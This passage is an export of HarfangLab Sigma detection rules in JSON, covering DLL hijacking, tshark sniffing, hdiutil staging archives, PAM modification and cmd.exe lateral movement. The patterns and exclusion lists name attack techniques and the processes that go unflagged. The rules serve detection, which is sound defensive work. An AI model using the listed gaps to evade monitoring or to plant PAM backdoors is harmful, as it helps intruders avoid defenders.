"rule_description": "Detects potential Windows DLL Hijacking via agentservice.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nThe rule matches an agentservice.exe signed by Microsoft Windows that runs from outside the Windows system directories and loads ACTIVEDS.dll, adsldpc.dll, FLTLIB.DLL or version.dll from a location that is also outside those directories and not signed by Microsoft Windows.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c07c9535-ed8d-4264-b08e-30fccffbe351",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624328Z",
"creation_date": "2026-03-23T11:45:34.624330Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624334Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/fdb6cdb7c66b8164aefb57c4ff88e594f0bae068/atomics/T1040/T1040.md#atomic-test-1---packet-capture-linux-using-tshark-or-tcpdump",
"https://attack.mitre.org/techniques/T1040/"
],
"name": "t1040_network_sniffing_tshark.yml",
"content": "title: Network Sniffed via tshark (Linux)\nid: c07c9535-ed8d-4264-b08e-30fccffbe351\ndescription: |\n Detects the execution of tshark, a protocol analyzer used to capture and analyze network traffic.\n It is often used to help troubleshoot network issues, but adversaries can use it to sniff network traffic and capture information about an environment, including authentication material passed over the network.\n It is recommended to check the parent processes for any other suspicious actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/fdb6cdb7c66b8164aefb57c4ff88e594f0bae068/atomics/T1040/T1040.md#atomic-test-1---packet-capture-linux-using-tshark-or-tcpdump\n - https://attack.mitre.org/techniques/T1040/\ndate: 2022/12/26\nmodified: 2025/11/28\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Tool.Tshark\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.SensitiveInformation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/tshark'\n\n filter_read_file:\n CommandLine|contains: ' -r '\n\n exclusion_container:\n - ParentImage:\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c07c9535-ed8d-4264-b08e-30fccffbe351",
"rule_name": "Network Sniffed via tshark (Linux)",
"rule_description": "Detects the execution of tshark, a protocol analyzer used to capture and analyze network traffic.\nIt is often used to help troubleshoot network issues, but adversaries can use it to sniff network traffic and capture information about an environment, including authentication material passed over the network.\nIt is recommended to check the parent processes for any other suspicious actions.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2025-11-28",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1040"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c086a838-90d0-40da-9f27-b89501f88044",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590480Z",
"creation_date": "2026-03-23T11:45:34.590486Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590499Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657",
"https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mscoree.yml",
"content": "title: Unsigned Mscoree.dll Loaded\nid: c086a838-90d0-40da-9f27-b89501f88044\ndescription: |\n Detects a suspicious unsigned DLL named 'mscoree.dll' loaded by a process that could be a target to DLL hijacking.\n Adversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\n It is recommended to investigate the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657\n - https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/02/13\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\mscoree.dll'\n sha256|contains: '?' # at least one character, some SHA256 are empty\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n filter_legitimate:\n ImageLoaded|startswith:\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\System32\\DriverStore\\'\n - '?:\\Windows\\System32\\mscoree.dll'\n - '?:\\Windows\\SysWOW64\\mscoree.dll'\n\n exclusion_known_sha:\n sha256: '0faaa9992142cb2933fa4112bcd62ba58fc0d8a6ac61bd3f05963bc6e8871c8b' # 10.0.22621.1 (WinBuild.160101.0800)\n\n exclusion_beyond_compare:\n Image|endswith: '\\Beyond Compare ?\\BCompare.exe'\n ImageLoaded|endswith: '\\Beyond Compare ?\\mscoree.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c086a838-90d0-40da-9f27-b89501f88044",
"rule_name": "Unsigned Mscoree.dll Loaded",
"rule_description": "Detects a suspicious unsigned DLL named 'mscoree.dll' loaded by a process that could be a target to DLL hijacking.\nAdversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\nIt is recommended to investigate the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-02-13",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c0d08a4d-f9d0-4017-b346-46c45ddb527a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618416Z",
"creation_date": "2026-03-23T11:45:34.618418Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618422Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1560/001/"
],
"name": "t1560_001_dmg_archive_creation_file.yml",
"content": "title: Archive Created via hdiutil in a Suspicious Folder\nid: c0d08a4d-f9d0-4017-b346-46c45ddb527a\ndescription: |\n Detects the creation of a disk image (e.g. a DMG archive) by the hdiutil utility with the create command in a folder commonly used by malicious actors for staging (/Users/Shared, /private/tmp or /private/var/tmp).\n Adversaries may compress and/or encrypt collected data prior to exfiltration.\n It is recommended to check the processes leading to hdiutil's execution and the content of the created image.\nreferences:\n - https://attack.mitre.org/techniques/T1560/001/\ndate: 2024/07/22\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560.001\n - attack.t1119\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Collection\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection:\n ProcessImage|endswith: '/hdiutil'\n ProcessCommandLine|contains: 'create'\n Path|startswith:\n - '/Users/shared/'\n - '/private/var/tmp/'\n - '/private/tmp/'\n Kind: 'create'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c0d08a4d-f9d0-4017-b346-46c45ddb527a",
"rule_name": "Archive Created via hdiutil in a Suspicious Folder",
"rule_description": "Detects the creation of a disk image (e.g. a DMG archive) by the hdiutil utility with the create command in a folder commonly used by malicious actors for staging (/Users/Shared, /private/tmp or /private/var/tmp).\nAdversaries may compress and/or encrypt collected data prior to exfiltration.\nIt is recommended to check the processes leading to hdiutil's execution and the content of the created image.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-03-06",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1119",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c0f2754a-239d-4e6e-acf2-04f65ab80452",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.665327Z",
"creation_date": "2026-03-23T11:45:35.297579Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297583Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md",
"https://github.com/zephrax/linux-pam-backdoor",
"https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9",
"https://attack.mitre.org/techniques/T1556/003/"
],
"name": "t1556_003_pam_modules_modified_linux.yml",
"content": "title: PAM Modules Modified\nid: c0f2754a-239d-4e6e-acf2-04f65ab80452\ndescription: |\n Detects an attempt to modify the Pluggable Authentication Modules (PAM) configuration files under /etc/pam.d/.\n PAM is a suite of libraries that allows a Linux system administrator to configure the methods used to authenticate users.\n Adversaries may modify the PAM configuration, or the modules it loads, to capture user credentials or to add a backdoor and achieve persistence.\n This rule only covers non-read accesses to /etc/pam.d/; it does not monitor the PAM module libraries themselves, and changes performed by package managers, configuration-management tools and several generic utilities (e.g. tar, rsync, sed, chmod) are excluded, so the absence of an alert does not prove the configuration is intact.\n It is recommended to investigate the context of this action to determine its legitimacy, including the process that performed the change and the resulting content of the modified file.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md\n - https://github.com/zephrax/linux-pam-backdoor\n - https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9\n - https://attack.mitre.org/techniques/T1556/003/\ndate: 2023/01/06\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.defense_evasion\n - attack.persistence\n - attack.t1556.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path|startswith: '/etc/pam.d/'\n - TargetPath|startswith: '/etc/pam.d/'\n is_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_swap_file:\n - Path:\n - '/etc/pam.d/.*.swp'\n - '/etc/pam.d/.*.swpx'\n - TargetPath:\n - '/etc/pam.d/.*.swp'\n - '/etc/pam.d/.*.swpx'\n\n exclusion_rpm:\n ProcessImage: '/usr/bin/rpm'\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n - ProcessAncestors|startswith: '/usr/bin/perl|/usr/bin/dash|/usr/bin/dpkg|'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n 
exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - '/usr/bin/python -Estt /usr/local/psa/bin/yum_install ' # Plesk\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n - 'dnf upgrade'\n - 'dnf update'\n - 'dnf install '\n - '/usr/bin/python?.? 
/usr/bin/dnf-3 '\n - '/usr/bin/dnf5 --installroot '\n exclusion_zypper:\n ProcessAncestors|startswith:\n - '/usr/bin/zypper|'\n - '/usr/bin/bash|/usr/bin/rpm|/usr/bin/zypper|'\n exclusion_pamac:\n ProcessImage: '/usr/bin/pamac-daemon'\n\n exclusion_packagekitd:\n ProcessImage: '/usr/libexec/packagekitd'\n\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n\n exclusion_pam_auth_update:\n # /usr/bin/perl -w /usr/sbin/pam-auth-update --package\n # /usr/bin/perl -w /usr/sbin/pam-auth-update --package --remove capability\n # /usr/bin/perl -w /usr/sbin/pam-auth-update --root --package\n - ProcessCommandLine|startswith: '/usr/bin/perl -w /usr/sbin/pam-auth-update'\n - ProcessParentCommandLine|startswith: '/usr/bin/perl -w /usr/sbin/pam-auth-update'\n\n exclusion_dpkg_postinst:\n ProcessParentCommandLine: '/bin/sh -e /var/lib/dpkg/info/libpam-runtime.postinst configure'\n\n exclusion_authconfig:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python /sbin/authconfig --updateall '\n - '/usr/bin/python /usr/sbin/authconfig --update '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/sh -c 
/usr/sbin/authconfig --update '\n - '/usr/bin/python /sbin/authconfig --updateall '\n - '/usr/bin/python /usr/sbin/authconfig --update '\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n\n exclusion_kaniko:\n ProcessImage: '/kaniko/executor'\n\n exclusion_sophos:\n ProcessImage: '/opt/sophos-av/engine/_/savscand.?'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - ProcessAncestors:\n - '*|/usr/bin/runc|/usr/bin/dockerd|/usr/lib/systemd/systemd'\n - '/usr/bin/bash|/snap/docker/*/bin/runc|/snap/docker/*/bin/dockerd|*'\n - '*|/usr/bin/containerd-shim-runc-v2|/usr/bin/containerd-shim-runc-v2|*'\n\n exclusion_docker2:\n ProcessImage: '*/bin/dockerd'\n ProcessCommandLine: 'docker-applyLayer *'\n\n exclusion_microdnf:\n ProcessImage: '/usr/bin/microdnf'\n\n exclusion_chmod:\n ProcessImage: '/bin/chmod'\n\n exclusion_vmware:\n ProcessCommandLine|contains:\n - 'vmware-config-tools'\n - 'vmware-uninstall-tools.pl'\n\n exclusion_authselect:\n ProcessImage: '/usr/bin/authselect'\n\n exclusion_apk:\n ProcessImage: '/sbin/apk'\n\n exclusion_podman:\n ProcessImage:\n - '/usr/bin/podman'\n - '/usr/bin/buildah'\n ProcessCommandLine: 'storage-*'\n\n exclusion_reconfigure:\n - ProcessCommandLine:\n - '/usr/bin/python3 /usr/bin/reconfigure'\n - '/usr/bin/python3 /usr/bin/reconfigure -a'\n - ProcessParentCommandLine:\n - '/usr/bin/python3 /usr/bin/reconfigure'\n - '/usr/bin/python3 /usr/bin/reconfigure -a'\n\n exclusion_qemu:\n ProcessImage: '/usr/bin/qemu-*-static'\n ProcessParentImage: '/usr/bin/qemu-*-static'\n\n exclusion_alternatives:\n ProcessImage:\n - '/usr/bin/update-alternatives'\n - '/usr/sbin/alternatives'\n ProcessCommandLine|startswith:\n - 'update-alternatives '\n - '/usr/sbin/alternatives '\n\n exclusion_deepinstinct:\n 
ProcessCommandLine: '/bin/bash /opt/deepinstinct/bin/StaticAnalysisService/start_sa_service.sh'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_realmd:\n - ProcessParentCommandLine: '/usr/lib64/realmd/realmd'\n - ProcessGrandparentCommandLine: '/usr/lib64/realmd/realmd'\n\n exclusion_buildah:\n ProcessAncestors|startswith: '|/usr/bin/buildah|'\n\n exclusion_sed1:\n ProcessImage: '/usr/bin/sed'\n Path: '/etc/pam.d/sed??????'\n exclusion_sed2:\n ProcessImage: '/usr/bin/sed'\n TargetPath: '/etc/pam.d/sed??????'\n\n exclusion_chown:\n ProcessCommandLine: 'chown -R '\n\n exclusion_rudder:\n ProcessImage: '/opt/rudder/bin/cf-agent'\n\n exclusion_puppet:\n ProcessImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_coreutils:\n ProcessImage: '/usr/bin/coreutils'\n\n exclusion_nxserver:\n ProcessParentCommandLine|startswith: '/bin/bash /usr/NX/scripts/setup/nxnode --install'\n\n exclusion_rsync:\n ProcessImage: '/usr/bin/rsync'\n\n exclusion_tar:\n ProcessImage: '/usr/bin/tar'\n\n exclusion_plesk:\n ProcessCommandLine|startswith: '/usr/libexec/platform-python -Estt /usr/local/psa/bin/dnf_install '\n\n exclusion_nixos:\n ProcessGrandparentImage: '/nix/store/*-switch-to-configuration-*/bin/switch-to-configuration'\n\n condition: selection and not is_read_access and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c0f2754a-239d-4e6e-acf2-04f65ab80452",
"rule_name": "PAM Modules Modified",
"rule_description": "Detects an attempt to modify pluggable authentication module (PAM) files, such as the configuration under /etc/pam.d.\nPAM is a suite of libraries that allows a Linux system administrator to configure how users are authenticated.\nAdversaries may modify PAM configuration or modules to access user credentials or to add a backdoor and achieve persistence.\nIt is recommended to investigate the context of this action (the writing process and its ancestors) to determine its legitimacy.\nNote that the rule carries broad exclusions for package managers, configuration-management tools and generic utilities such as tar, rsync, chmod and chown -R; a modification performed through one of those will not alert and should be reviewed by other means.\n",
"rule_creation_date": "2023-01-06",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1556.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c110eda5-b1c7-4bb4-9a9d-8a48bcc98222",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073005Z",
"creation_date": "2026-03-23T11:45:34.073007Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073012Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1047/",
"https://attack.mitre.org/techniques/T1021/002/",
"https://attack.mitre.org/techniques/T1021/003/"
],
"name": "t1047_suspicious_lateral_movement.yml",
"content": "title: Suspicious Lateral Movement\nid: c110eda5-b1c7-4bb4-9a9d-8a48bcc98222\ndescription: |\n Detects a suspicious lateral movement where specifics cmd.exe arguments are used with mixed case.\n The cmd.exe options /q and /c are commonly used to execute commands but in many offensive tools the two arguments are used with mixed case in a specific order.\n For example this construction is used by tools such as Impacket, NetExec, CrackMapExec.\n It is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\nreferences:\n - https://attack.mitre.org/techniques/T1047/\n - https://attack.mitre.org/techniques/T1021/002/\n - https://attack.mitre.org/techniques/T1021/003/\ndate: 2023/12/20\nmodified: 2025/03/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.lateral_movement\n - attack.t1021.002\n - attack.t1021.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage:\n - '*\\wmiprvse.exe'\n - '*\\mmc.exe'\n - '*\\explorer.exe'\n - '*\\services.exe'\n - '*\\svchost.exe'\n - '*\\taskeng.exe'\n - '*\\winrshost.exe'\n - '*\\wsmprovhost.exe'\n ProcessImage: '*\\cmd.exe'\n CommandLine|re: '.* [/-]Q [/-]c .*'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c110eda5-b1c7-4bb4-9a9d-8a48bcc98222",
"rule_name": "Suspicious Lateral Movement",
"rule_description": "Detects suspicious lateral movement where specific cmd.exe arguments are used with mixed case.\nThe cmd.exe options /q and /c are commonly used to execute commands, but many offensive tools pass them with a fixed mixed-case spelling and order (/Q then /c, uppercase Q and lowercase c), which is what this rule matches when cmd.exe is spawned by a remote-execution host process such as wmiprvse.exe, services.exe, svchost.exe or wsmprovhost.exe.\nThis construction is used by tools such as Impacket, NetExec and CrackMapExec.\nIt is recommended to investigate the actions of the child process and to identify the source of the remote connection using authentication logs.\n",
"rule_creation_date": "2023-12-20",
"rule_modified_date": "2025-03-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1021.003",
"attack.t1047"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c143a1ec-5597-4f0e-8998-2d80ce946637",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
